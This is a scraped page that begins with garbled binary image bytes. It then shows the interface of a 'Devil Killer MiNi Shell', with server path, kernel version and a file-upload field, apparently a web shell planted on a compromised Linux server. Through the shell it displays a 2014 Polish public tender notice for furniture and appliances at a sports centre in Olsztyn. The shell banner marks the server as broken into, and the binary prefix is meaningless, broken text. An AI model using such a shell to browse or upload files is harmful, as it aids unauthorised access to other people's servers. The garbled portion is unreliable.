JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140430/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140430/93859-N-2014.html

<p class="kh_header"><b>Olsztyn: DOSTAWA I MONTAŻ WYPOSAŻENIA POMIESZCZEŃ (MEBLI) W CENTRUM SPORTOWO-REKREACYJNYM UKIEL W OLSZTYNIE</b><br>
<b>Numer ogłoszenia: 93859 - 2014; data zamieszczenia: 30.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Sportu i Rekreacji w Olsztynie , ul. Żołnierska 13 A, 10-558 Olsztyn, woj. warmińsko-mazurskie, tel. 89 5335132, faks 89 5335132.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.osir.olsztyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna jednostki samorządu terytorialnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA I MONTAŻ WYPOSAŻENIA POMIESZCZEŃ (MEBLI) W CENTRUM SPORTOWO-REKREACYJNYM UKIEL W OLSZTYNIE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Dostawa i montaż wyposażenia pomieszczeń (mebli) w Centrum Rekreacyjno-Sportowym Ukiel w Olsztynie na Obszarze A - ul. Jeziorna 8 oraz na obszarze D -  ul. Jodłowa 9A.
1.1.	 Część 1: DOSTAWA MEBLI BIUROWYCH  do Centrum Rekreacyjno-Sportowego Obszar A i D, zgodnie z opisem przedmiotu zamówienia zawartym w załączniku nr 3 do SIWZ.
1.2.	 Część 2: DOSTAWA MEBLI GABINETOWYCH do Centrum Rekreacyjno-Sportowego  Obszar A zgodnie z opisem przedmiotu zamówienia zawartym w załączniku nr 3 do SIWZ.
1.3.	Część 3: DOSTAWA TAPICEROWANYCH MEBLI WYPOCZYNKOWYCH do Centrum Rekreacyjno-Sportowego Obszar D, zgodnie z opisem przedmiotu zamówienia zawartym w załączniku nr 3 do SIWZ.
1.4.	 Część 4: DOSTAWA MEBLI WARSZTATOWYCH  do Centrum Rekreacyjno-Sportowego Obszar A i D zgodnie z opisem przedmiotu zamówienia zawartym w załączniku nr 3 do SIWZ.
1.5.	 Część 5: DOSTAWA I MONTAŻ WYPOSAŻENIA SZATNI do Centrum Rekreacyjno-Sportowego Obszar A i D zgodnie z opisem przedmiotu zamówienia zawartym w załączniku nr 3 do SIWZ.
1.6.	Część 6: DOSTAWA MEBLI SPECJALNYCH I POZOSTAŁEGO WYPOSAŻENIA do Centrum Rekreacyjno-Sportowego Obszar A zgodnie z opisem przedmiotu zamówienia zawartym w załączniku nr 3 do SIWZ.
1.7.	 Część 7: DOSTAWA URZĄDZEŃ AGD  do Centrum Rekreacyjno-Sportowego zgodnie z opisem przedmiotu zamówienia zawartym w załączniku nr 3 do SIWZ.
2.	Przedmiotem zamówienia jest dostawa i montaż fabrycznie nowego wyposażenia pomieszczeń (mebli) , wolnego od wad, nie noszącego śladów użytkowania.
3.	Oferowane wyposażenie i użyte materiały muszą być dopuszczone do obrotu oraz odpowiadać warunkom jakościowym zgodnie z obowiązującymi atestami i normami polskimi i równoważnymi.
4.	Wycena powinna zawierać wykonanie, dowóz, montaż i inne koszt koszty wynikające z realizacji zamówienia zgodnie z opisem SIWZ. 
5.	Okres gwarancji i odpowiedzialność z tytułu rękojmi - co najmniej 24 miesiące od daty dostawy.
6.	 Wykonawca zapewni w okresie pogwarancyjnym dostępność części zamiennych oraz pełny serwis przedmiotu umowy, przez okres 3 lat licząc od daty zakończenia okresu gwarancji na warunkach określonych w odrębnej umowie.
7.	Wykonawca zobowiązany jest do usunięcia zgłoszonych usterek w terminie 72 godzin dla urządzeń, a dla pozostałego wyposażenia - 14 dni od zgłoszenia w okresie obowiązywania gwarancji a także podstawienia sprzętu zastępczego - w przypadku gdy sprzętu nie można naprawić na miejscu.
8.	Wykonawca winien przed złożeniem oferty szczegółowo zapoznać się ze Specyfikacją Istotnych Warunków Zamówienia, przedmiotem zamówienia i technologiami poszczególnych budynków, załącznikami do SIWZ  oraz na własny koszt i ryzyko uzyskać niezbędne informacje konieczne do złożenia oferty.
9.	Wykonawca przed podpisaniem umowy zobowiązany jest do przekazania Zamawiającemu wizualizacji mebli z podanymi wymiarami oraz dostępną paletę kolorów dla poszczególnych mebli. Zamawiający w terminie 5 dni ustali z Wykonawcą ostateczne kolory płyt melaminowanych, kolory obić tapicerskich oraz kolory stelaży. Wykonawca będzie zobowiązany do dostawy mebli zgodnie z ustaloną kolorystyką
10.	Warunki płatności - przelewem w terminie do 21 od daty otrzymania faktury na rachunek bankowy wskazany przez Wykonawcę. Za datę zapłaty uważa się datę obciążenia rachunku bankowego Zamawiającego..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3, 39.11.20.00-0, 39.12.10.00-6, 39.13.00.00-2, 39.14.14.00-6, 45.42.11.53-1, 39.70.00.00-9, 39.51.61.00-3, 37.44.00.00-4, 30.19.10.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 12.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień, dla uznania, że wykonawca spełnia warunek posiadania uprawnień do wykonywania określonej działalności lub czynności, zamawiający żąda, by wykonawca złożył oświadczenie (załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że wykonawca spełnia warunek posiadania wiedzy i doświadczenia, zamawiający żąda, by wykonawca złożył oświadczenie (złącznik Nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że wykonawca spełnia warunek dysponowania potencjałem technicznym zamawiający żąda, by wykonawca złożył oświadczenie (załącznik Nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że wykonawca spełnia warunek dysponowania osobami zdolnymi do wykonania zamówienia zamawiający żąda, by wykonawca złożył oświadczenie (załącznik Nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że wykonawca spełnia warunek posiadania odpowiedniej sytuacji ekonomicznej i finansowej, zamawiający żąda, by wykonawca złożył oświadczenie (załącznik nr 2 do SIWZ)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Formularz oferty - załącznik nr 1 do SIWZ; 2.Formularze cenowe, odpowiednio - załączniki nr 4A, 4B, 4C, 4D, 4E, 4F, 4G do SIWZ;</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>6.	Wszelkie zmiany lub uzupełnienia niniejszej umowy wymagają zachowanie formy pisemnej pod rygorem nieważności i wchodzą w życie z dniem podpisania przez Strony.
7.	Zamawiający dopuszcza możliwość  dostawy wyposażenia  i urządzeń o cechach lub parametrach wyższych niż w ofercie w przypadku braku dostępności ich na rynku, przy czym ceny zawarte w ofercie nie mogą ulec zmianie.
8.	Dopuszcza się zmianę terminu realizacji prac w przypadku:
a)	braku możliwości realizacji przedmiotu umowy z powodów wskazanych przez Zamawiającego,
b)	przedłużenia terminu do realizacji zamówienia  w przypadku, gdy dostawa przedmiotu umowy  
w pierwotnym terminie będzie niemożliwa z powodu okoliczności niezależnych od Wykonawcy,  zdarzenia losowego (np. huragan, powódź lub inne kataklizmy),  w przypadku konieczności zmiany podwykonawcy,  
9.	Dopuszcza się zmianę umowy w przypadku zmiany przepisów prawa powszechnie obowiązującego, jeśli zmiana ta wpływa na zakres lub warunki wykonania przez strony świadczeń wynikających z umowy, 
a zmiana ta polega na dostosowaniu jej postanowień do zmienionych przepisów i realizacji celu umowy; 
10.	Dopuszcza się zastosowanie innej stawki i wysokości podatku VAT określonego w § 4 ust. 2 w przypadku zmiany obowiązujących w tym zakresie przepisów, z zastrzeżeniem, że kwota wynagrodzenia brutto za przedmiot umowy nie ulegnie zmianie.
11.	Dopuszcza się zmianę zakresu przedmiotu umowy poprzez wyłączenie części dostaw z  jednoczesnym obniżeniem wynagrodzenia wykonawcy o wartość wyłączonej części zamówienia.
12.	Dopuszcza się zmianę podwykonawcy i zakresu podwykonawstwa z zastrzeżeniem, że przedmiot umowy 
i wynagrodzenie nie ulegną zmianie. 
13.	Zamawiający   dopuszcza  ponadto możliwość   zmian   redakcyjnych   umowy,   zmian będących   następstwem   zmian   danych   zarówno  jego  jak  i   Wykonawcy,   w  tym ujawnionych   w   rejestrach   publicznych   (np.   zmiana   oznaczenia   adresu,  oznaczenia  nazwy wykonawcy, osób uprawnionej do kontaktów oraz innych zmian nie stanowiących istotnych  zmian treści umowy w stosunku do treści oferty. W takiej sytuacji, wprowadzenie do umowy stosownych zmian nie stanowiących zmian treści umowy 
w stosunku do treści oferty nie będzie wymagało zachowania formy pisemnej, a jedynie notatki protokół 
i zatwierdzonego przez przedstawicieli obu stron.
14.	Wszelkie   zmiany  wprowadzane   do   umowy   dokonywane   będą  z   poszanowaniem obowiązków wynikających z przepisów prawa,  w tym w szczególności  nie mogą powodować    wykroczenia   poza    określenie    przedmiotu    zamówienia   zawarte   w specyfikacji istotnych warunków zamówienia, zgodnie z art. 140 ust. 3 ustawy Prawo zamówień publicznych (t.j. Dz. U. z 2010 r. Nr 113, poz. 759 z pozn. zm.) oraz nie mogą powodować obejścia przepisu art. 144 ustawy Prawo zamówień publicznych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.osir.olsztyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Sportu i Rekreacji w Olsztynie, 10-558 Olsztyn, ul. Żołnierska 13A.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.05.2014 godzina 13:00, miejsce: Ośrodek Sportu i Rekreacji w Olsztynie, 10-558 Olsztyn, ul. Żołnierska 13A, pok. nr 4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> DOSTAWA MEBLI BIUROWYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Fotel obrotowy typ 1	7 szt.
2	Fotel obrotowy typ 2	12 szt.
3	Fotel obrotowy, pracowniczy	24 szt.
4	Krzesło łączone w rząd w wersji 5-osobowej	1 szt.
5	Krzesło konferencyjne łączone w rząd	6 szt.
6	Krzesło biurowe z podłokietnikiem	10 szt.
7	Krzesło konferencyjne z podłokietnikiem 	61 szt.
8	Fotel konferencyjny	5 szt.
9	Krzesło konferencyjne z składanym stolikiem	50 szt.
10	Krzesło konferencyjne, pracownicze	20 szt.
11	Biurko (prawe) (wcięcie blatu z lewej strony)	6 szt.
12	Biurko (lewe) (wcięcie blatu z prawej strony)	5 szt.
13	Biurko z kontenerem	9 szt.
14	Biurko 	1 szt.
15	Dostawka do biurka z kontenerem (lewa)	2 szt.
16	Dostawka do biurka z kontenerem (prawa)	1 szt.
17	Dostawka do biurka z szafką (lewa)	1 szt.
18	Kontener dostawka 	6 szt.
19	Kontener na kółkach	5 szt.
20	Komoda aktowa z drzwiami	8 szt.
21	Komoda aktowa	4 szt.
22	Stół	8 szt.
23	Stolik dostawka	1 szt.
24	Stolik prostokątny	10 szt.
25	Stolik okrągły	1 szt.
26	Stół konferencyjny składany typ 1	4 szt.
27	Stół konferencyjny składany typ 2	16 szt.
28	Słupek ubraniowy	2 szt.
29	Szafa aktowa	13 szt.
30	Szafa ubraniowo-aktowa	3 szt.
31	Szafa ubraniowa	6 szt.
32	Biblioteczka przeszklona 1	3 szt.
33	Biblioteczka przeszklona 2	5 szt.
34	Wózek pod komputer	2 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3, 39.11.20.00-0, 39.12.10.00-6, 39.13.00.00-2, 39.14.14.00-6, 45.42.11.53-1, 39.51.61.00-3, 37.44.00.00-4, 30.19.10.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 12.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> DOSTAWA MEBLI GABINETOWYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Biurko gabinetowe	1 szt.
2	Dostawka do biurka	1 szt.
3	Kontener z szufladami	1 szt.
4	Komoda	3 szt.
5	Szafa 	1 szt.
6	Szafa z drzwiami przeszklonymi	1 szt.
7	Stół 	1 szt.
8	Stół konferencyjny	2 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3, 39.11.20.00-0, 39.12.10.00-6, 39.13.00.00-2, 39.14.14.00-6, 45.42.11.53-1, 39.51.61.00-3, 37.44.00.00-4, 30.19.10.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 25.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> DOSTAWA TAPICEROWANYCH MEBLI WYPOCZYNKOWYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Sofa 2-osobowa	7 szt.
2	Sofa 3-osobowa	12 szt.
3	Sofa 1-osobowa	7 szt.
4	Sofa o nieregularnym kształcie	3 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3, 39.11.20.00-0, 39.12.10.00-6, 39.13.00.00-2, 39.14.14.00-6, 45.42.11.53-1, 39.51.61.00-3, 37.44.00.00-4, 30.19.10.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 12.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> DOSTAWA MEBLI WARSZTATOWYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Regał metalowy wspornikowy, 1-stronny	1 szt.
2	Regał metalowy wspornikowy, 2-stronny	2 szt.
3	Regał metalowy 	61 szt.
4	Stół monterski	6 szt.
5	Stół warsztatowy z nadbudową 	2 szt.
6	Szafa magazynowa zamykana	28 szt.
7	Szafka narzędziowa stojąca	1 szt.
8	Szafka narzędziowa wisząca	4 szt.
9	Tablica narzędziowa	5 szt.
10	Wózek warsztatowy	2 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3, 39.11.20.00-0, 39.11.21.00-6, 39.13.00.00-2, 39.14.14.00-6, 45.42.11.53-1, 39.51.61.00-3, 37.44.00.00-4, 30.19.10.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 12.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> DOSTAWA I MONTAŻ WYPOSAŻENIA SZATNI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Szafa ubraniowa HPL typu L (2-os.)	119 szt.
2	Szafa ubraniowa HPL typu L z ławką (4-os.)	5 szt.
3	Szafa ubraniowa HPL (2-osobowa)	11 szt.
4	Szafa ubraniowa HPL (3-osobowa)	1 szt.
5	Szafa skrytkowa 3-dzielna (2-kolumnowa)	1 szt.
6	Szafa skrytkowa 3-dzielna (3-kolumnowa)	3 szt.
7	Ławka wolnostojąca (dł. 160cm)	3 szt.
8	Ławka szatniowa (dł. 120cm)	2 szt.
9	Ławka szatniowa (dł. 160cm)	5 szt.
10	Ławka szatniowa (dł. 200cm)	10 szt.
11	Ławka szatniowa (dł. 240cm)	1 szt.
12	Ławka szatniowa (dł. 280cm)	5 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3, 39.11.20.00-0, 39.12.10.00-6, 39.13.00.00-2, 39.14.14.00-6, 45.42.11.53-1, 39.51.61.00-3, 37.44.00.00-4, 30.19.10.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 12.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> DOSTAWA MEBLI SPECJALNYCH I POZOSTAŁEGO WYPOSAŻENIA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Kozetka lekarska	1 szt.
2	Szafa lekarska przeszklona	1 szt.
3	Parawan medyczny, podwójny	1 szt.
4	Szafka pod zlewozmywak (z zlewem i baterią)	1 szt.
5	Leżak drewniany z regulowanym oparciem	40 szt.
6	Wieszak stojący	12 szt.
7	Wieszak szatniowy mobilny	6 szt.
8	Gablota informacyjna wewnętrzna (mała)	7 szt.
9	Gablota informacyjna wewnętrzna (duża)	5 szt.
10	Tablica suchościeralna	3 szt.
11	Drabinka gimnastyczna	4 szt.
12	Słupki odgradzające z taśmą	25 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3, 39.11.20.00-0, 39.12.10.00-6, 39.13.00.00-2, 39.14.14.00-6, 45.42.11.53-1, 39.51.61.00-3, 37.44.00.00-4, 30.19.10.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 25.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> DOSTAWA URZĄDZEŃ AGD.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Lodówka duża	1 szt.
2	Lodówka mała	3 szt.
3	Lodówka do zabudowy	1 szt.
4	Automatyczny ekspres do kawy	1 szt.
5	Ekspres do kawy (na kapsułki)	1 szt.
6	Kuchenka mikrofalowa	3 szt.
7	Zmywarka do zabudowy	1 szt.
8	Odkurzacz przemysłowy	1 szt.
9	Odkurzacz	2 szt.
